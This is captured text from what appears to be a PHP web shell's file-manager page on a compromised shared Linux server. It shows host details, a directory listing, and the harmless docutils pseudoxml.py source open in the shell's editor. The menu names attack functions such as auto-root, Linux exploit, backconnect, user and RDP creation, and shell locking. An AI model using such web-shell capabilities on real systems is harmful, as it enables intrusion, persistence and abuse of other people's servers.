Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
docutils /
writers /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
html4css1
[ DIR ]
drwxr-xr-x
html5_polyglot
[ DIR ]
drwxr-xr-x
latex2e
[ DIR ]
drwxr-xr-x
odf_odt
[ DIR ]
drwxr-xr-x
pep_html
[ DIR ]
drwxr-xr-x
s5_html
[ DIR ]
drwxr-xr-x
xetex
[ DIR ]
drwxr-xr-x
__init__.py
4.88
KB
-rw-r--r--
_html_base.py
63.15
KB
-rw-r--r--
docutils_xml.py
6.97
KB
-rw-r--r--
manpage.py
35.56
KB
-rw-r--r--
null.py
450
B
-rw-r--r--
pseudoxml.py
1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pseudoxml.py
# $Id: pseudoxml.py 8592 2020-12-15 23:06:26Z milde $ # Author: David Goodger <goodger@python.org> # Copyright: This module has been placed in the public domain. """ Simple internal document tree Writer, writes indented pseudo-XML. """ __docformat__ = 'reStructuredText' from docutils import writers, frontend class Writer(writers.Writer): supported = ('pprint', 'pformat', 'pseudoxml') """Formats this writer supports.""" settings_spec = ( '"Docutils pseudo-XML" Writer Options', None, (('Pretty-print <#text> nodes.', ['--detailled'], {'action': 'store_true', 'validator': frontend.validate_boolean}), )) config_section = 'pseudoxml writer' config_section_dependencies = ('writers',) output = None """Final translated form of `document`.""" def translate(self): self.output = self.document.pformat() def supports(self, format): """This writer supports all format-specific elements.""" return True
Close